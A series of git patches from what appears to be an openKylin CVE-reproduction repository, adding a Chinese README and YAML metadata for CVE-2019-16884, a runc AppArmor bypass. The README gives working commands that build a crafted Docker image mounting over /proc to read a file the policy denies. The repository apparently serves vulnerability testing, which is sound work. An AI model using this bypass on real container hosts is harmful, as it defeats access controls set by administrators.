From f88f2d937de483f98b9421eb09cfe25aa361d239 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 06:32:59 +0000
Subject: [PATCH 01/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2019/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2019/.keep

diff --git a/cve/linux-kernel/2019/.keep b/cve/linux-kernel/2019/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 2d8a5c9f79ada0e3d722100a774b4e1d8e2058b7 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 06:33:18 +0000
Subject: [PATCH 02/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-16884?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2019/CVE-2019-16884/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2019/CVE-2019-16884/.keep

diff --git a/cve/linux-kernel/2019/CVE-2019-16884/.keep b/cve/linux-kernel/2019/CVE-2019-16884/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 2a6db5423d027d5bcff024fc101bdcc72c9a695b Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 06:33:37 +0000
Subject: [PATCH 03/18] update  cve/linux-kernel/2019/CVE-2019-16884/.keep.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/CVE-2019-16884/{.keep => ReadMe.md} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/linux-kernel/2019/CVE-2019-16884/{.keep => ReadMe.md} (100%)

diff --git a/cve/linux-kernel/2019/CVE-2019-16884/.keep b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md
similarity index 100%
rename from cve/linux-kernel/2019/CVE-2019-16884/.keep
rename to cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md
-- 
Gitee


From 9f1996e81e089055c852b06db2131dfeea2d5db1 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 06:54:27 +0000
Subject: [PATCH 04/18] update cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 .../2019/CVE-2019-16884/ReadMe.md             | 68 +++++++++++++++++++
 1 file changed, 68 insertions(+)

diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md
index e69de29b..0c8d3f42 100644
--- a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md
+++ b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md
@@ -0,0 +1,68 @@
+# CVE-2019-16884
+
+PoC for CVE-2019-16884
+### 简介
+apparmor 可以让管理员通过程序的配置文件限制程序的功能，其本身作为一个内核模块集成在 Linux 内核中
+（可能发现 lsmod 里面并没有 apparmor，这是因为 lsmod 展示的是所有动态加载的内核模块，
+通过 ls /sys/module/ 就可以看到所有的内核模块包括系统中内置的），因此其通过内核提供强访问控制。
+
+CVE-2019-16884 可以使得用户绕过 apparmor 的一些策略进而可以实现一些提权操作。
+
+```
+cat /sys/module/apparmor/parameters/enabled       # 查看是否开启apparmor，返回为Y表示开启
+sudo cat /sys/kernel/security/apparmor/profiles   # 查看加载的配置文件
+```
+### 构建实验环境
+
+```
+> docker run -it ssst0n3/docker_archive:CVE-2019-16884
+
+ubuntu login: root
+Password: root
+```
+### 漏洞复现
+#### 1、创建apparmor规则
+
+```
+> cat > /etc/apparmor.d/no_flag <<EOF
+
+#include <tunables/global>
+profile no_flag flags=(attach_disconnected,mediate_deleted) {
+  #include <abstractions/base>
+  file,
+  deny /flag r,
+}
+EOF
+```
+
+#### 2、创建一个flag文件
+```
+echo "Al1ex is comming" > /tmp/flag
+```
+
+#### 3、应用规则
+```
+/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag
+```
+
+#### 4、检测，启动一个正常镜像此时无权限读取/flag内容3
+```
+docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag
+```
+
+#### 5、利用漏洞启用一个恶意镜像，可以读取/flag
+```
+> mkdir -p rootfs/proc/self/{attr,fd}
+> touch rootfs/proc/self/{status,attr/exec}
+> touch rootfs/proc/self/fd/{4,5}
+> cat <<EOF > Dockerfile
+FROM busybox
+ADD rootfs / 
+VOLUME /proc
+EOF
+> docker build -t apparmor-bypass .    
+> docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag
+```
+
+通过上述步骤即可完成漏洞的复现
+
-- 
Gitee


From c859ce072906d07765ea4f00bf504c1d39399146 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 06:54:57 +0000
Subject: [PATCH 05/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2019/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2019/yaml/.keep

diff --git a/cve/linux-kernel/2019/yaml/.keep b/cve/linux-kernel/2019/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From f3c6b9b19b24845ee374efd4e32604ff246b3410 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 07:10:48 +0000
Subject: [PATCH 06/18] rename cve/linux-kernel/2019/yaml/.keep to
 cve/linux-kernel/2019/yaml/CVE-2019-16884. Add CVE-2019-6884

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/.keep          |  0
 cve/linux-kernel/2019/yaml/CVE-2019-16884 | 20 ++++++++++++++++++++
 2 files changed, 20 insertions(+)
 delete mode 100644 cve/linux-kernel/2019/yaml/.keep
 create mode 100644 cve/linux-kernel/2019/yaml/CVE-2019-16884

diff --git a/cve/linux-kernel/2019/yaml/.keep b/cve/linux-kernel/2019/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884 b/cve/linux-kernel/2019/yaml/CVE-2019-16884
new file mode 100644
index 00000000..7a6d3a41
--- /dev/null
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884
@@ -0,0 +1,20 @@
+id: CVE-2019-16884
+source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e
+info:
+  name: linux kernel
+  severity: high
+  description: |
+    runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
+  scope-of-influence:
+    Red Hat Enterprise Linux 8  
+    Red Hat Enterprise Linux 7 Extras
+  reference:
+    -  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
+    -  https://usn.ubuntu.com/usn/usn-4297-1
+    -  https://security.netapp.com/advisory/ntap-20220221-0004/
+  classification:
+    cvss-metrics:   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-16884
+    cwe-id: CWE-863
+  tags: privilege escalation
\ No newline at end of file
-- 
Gitee


From b7bc5e6c586726a5272121840a9b9761590026cf Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:45:03 +0000
Subject: [PATCH 07/18] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/linux-kernel/2019/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2019/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/linux-kernel/2019/.keep

diff --git a/cve/linux-kernel/2019/.keep b/cve/linux-kernel/2019/.keep
deleted file mode 100644
index e69de29b..00000000
-- 
Gitee


From 7c6d439c40056218e468f711c2990697e52a5b82 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:47:02 +0000
Subject: [PATCH 08/18] rename cve/linux-kernel/2019/yaml/CVE-2019-16884 to
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 .../2019/yaml/{CVE-2019-16884 => CVE-2019-16884.yaml}             | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/linux-kernel/2019/yaml/{CVE-2019-16884 => CVE-2019-16884.yaml} (100%)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884 b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
similarity index 100%
rename from cve/linux-kernel/2019/yaml/CVE-2019-16884
rename to cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
-- 
Gitee


From a09e8ee80d0576ba54ee8183ce545ee5ac727ee6 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:52:45 +0000
Subject: [PATCH 09/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 7a6d3a41..0986572e 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -1,7 +1,7 @@
 id: CVE-2019-16884
 source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e
 info:
-  name: linux kernel
+  name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
   severity: high
   description: |
     runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
-- 
Gitee


From 451245bf4e4f70526081b24f225334c2293e1d01 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:57:56 +0000
Subject: [PATCH 10/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 0986572e..6474da05 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -7,7 +7,11 @@ info:
     runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
   scope-of-influence:
     Red Hat Enterprise Linux 8  
-    Red Hat Enterprise Linux 7 Extras
+    Red Hat Enterprise Linux 7 Extras  
+    Red Hat OpenShift Container Platform 4.1	
+    Red Hat OpenShift Container Platform 4.2
+    Red Hat OpenShift Container Platform 3.9
+    
   reference:
     -  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
     -  https://usn.ubuntu.com/usn/usn-4297-1
-- 
Gitee


From 91f7061bef1c0e518cfe3f2da45286a6f78c57a7 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:58:20 +0000
Subject: [PATCH 11/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 6474da05..59b3a07d 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -11,7 +11,6 @@ info:
     Red Hat OpenShift Container Platform 4.1	
     Red Hat OpenShift Container Platform 4.2
     Red Hat OpenShift Container Platform 3.9
-    
   reference:
     -  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
     -  https://usn.ubuntu.com/usn/usn-4297-1
-- 
Gitee


From baa2efb992582f695c63860ef03f30cc12949af8 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 08:58:42 +0000
Subject: [PATCH 12/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 59b3a07d..7d3322e7 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -6,9 +6,9 @@ info:
   description: |
     runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
   scope-of-influence:
-    Red Hat Enterprise Linux 8  
-    Red Hat Enterprise Linux 7 Extras  
-    Red Hat OpenShift Container Platform 4.1	
+    Red Hat Enterprise Linux 8
+    Red Hat Enterprise Linux 7 Extras
+    Red Hat OpenShift Container Platform 4.1
     Red Hat OpenShift Container Platform 4.2
     Red Hat OpenShift Container Platform 3.9
   reference:
-- 
Gitee


From 5078807e52ed619e9bea4e07b91861302f23fba3 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 09:01:25 +0000
Subject: [PATCH 13/18] update openkylin_list.yaml Add CVE-2019-16884

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367..a4bb7ea0 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -19,6 +19,7 @@ cve:
   apache-tomcat:
     - CVE-2020-13935
   linux-kernel:
+    - CVE-2019-16884
     - CVE-2021-4204
     - CVE-2021-22555
     - CVE-2021-4154
-- 
Gitee


From 7dc200fa688f7b826e466106b0f64ca3ff6eb5be Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 09:02:28 +0000
Subject: [PATCH 14/18] update openkylin_list.yaml

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 openkylin_list.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a4bb7ea0..5a8b7367 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -19,7 +19,6 @@ cve:
   apache-tomcat:
     - CVE-2020-13935
   linux-kernel:
-    - CVE-2019-16884
     - CVE-2021-4204
     - CVE-2021-22555
     - CVE-2021-4154
-- 
Gitee


From 69e614c976da49f33aebfe9a34a7dc0b20ea61ae Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 09:03:10 +0000
Subject: [PATCH 15/18] update other_list.yaml. Add  CVE-2019-16884

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/other_list.yaml b/other_list.yaml
index eae3bac2..5d280333 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -1,6 +1,7 @@
 #此收录漏洞列表为非openKylin发行版用例。
 cve: 
   linux-kernel:
+    - CVE-2019-16884
     - CVE-2021-33909
     - CVE-2021-3493
     - CVE-2022-0995
-- 
Gitee


From 21f50aa4dd72ab8547936a0b1d259c3ea7d54453 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Wed, 15 Mar 2023 10:14:05 +0000
Subject: [PATCH 16/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 7d3322e7..7403b326 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -1,5 +1,5 @@
 id: CVE-2019-16884
-source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e
+source: None
 info:
   name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
   severity: high
@@ -20,4 +20,6 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2019-16884
     cwe-id: CWE-863
+    cnvd-id: None
+    kve-id: None
   tags: privilege escalation
\ No newline at end of file
-- 
Gitee


From f80d2b71e50de6bd47debc725c4eb5ea18e3fc99 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Fri, 17 Mar 2023 02:04:08 +0000
Subject: [PATCH 17/18] =?UTF-8?q?update=20cve/linux-kernel/2019/yaml/CVE-2?=
 =?UTF-8?q?019-16884.yaml.=20=E6=9B=B4=E6=96=B0source?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index 7403b326..efe1dd0c 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -1,5 +1,5 @@
 id: CVE-2019-16884
-source: None
+source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
 info:
   name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
   severity: high
-- 
Gitee


From 363aef64f34bbd0ed1cff0eaaaa3d07283d17905 Mon Sep 17 00:00:00 2001
From: Hua <jason_hua@buaa.edu.cn>
Date: Fri, 17 Mar 2023 08:41:13 +0000
Subject: [PATCH 18/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml.

Signed-off-by: Hua <jason_hua@buaa.edu.cn>
---
 cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
index efe1dd0c..0f38b714 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml
@@ -1,5 +1,5 @@
 id: CVE-2019-16884
-source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
+source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md
 info:
   name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
   severity: high
-- 
Gitee